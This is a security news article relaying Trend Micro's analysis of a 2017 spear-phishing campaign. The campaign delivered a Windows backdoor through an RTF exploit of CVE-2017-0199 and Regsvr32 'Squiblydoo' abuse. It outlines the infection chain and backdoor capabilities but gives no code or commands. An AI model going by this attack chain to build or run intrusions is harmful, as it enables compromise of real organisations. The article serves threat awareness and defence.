Trend Micro alerts users that an email campaign which appeared a couple of months ago is currently targeting Russian-speaking enterprises and delivering a new Windows-based backdoor.
The campaign uses a number of different exploits and Windows components for running malicious scripts trying to make detection and blocking more challenging.
The first sample related to the spam campaign registered five spam runs from June 23 to July 27, 2017. According to security researchers, this campaign is still active now, targeting financial institutions and mining firms.
Experts from Trend Micro point out that hackers have diversified their tactics by sending different, targeted emails for each run. According to the researchers, due to the emails’ limited distribution and specificity in social engineering lures, they should be considered part of a spear-phishing campaign.
The spam emails resemble invoices from sales and billing departments, containing a malformed Rich Text Format (RTF) file which exploits a vulnerability (CVE-2017-0199) in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface patched in April, this year.
Then, the DLL calls the Regsvr32 (Microsoft Register Server) command-line utility in order to execute with specific parameters. This attack method is named Squiblydoo and it abuses Regsvr32 to bypass restrictions on running scripts and evade application white listing protections such as AppLocker.
“While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe,” Trend Micro says.
Then, another XML file is executed, after being downloaded from the domain wecloud[.]biz. which is the main backdoor used in the attack using the same Regsvr32-abusing the Squiblydoo technique.
Following the received commands, the malware is capable of downloading and executing Portable Executable (PE) files, running shell commands, downloading additional/new scripts, deleting files/startup entries, or running new script and terminating the current one.
According to experts from Trend Micro, “While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.”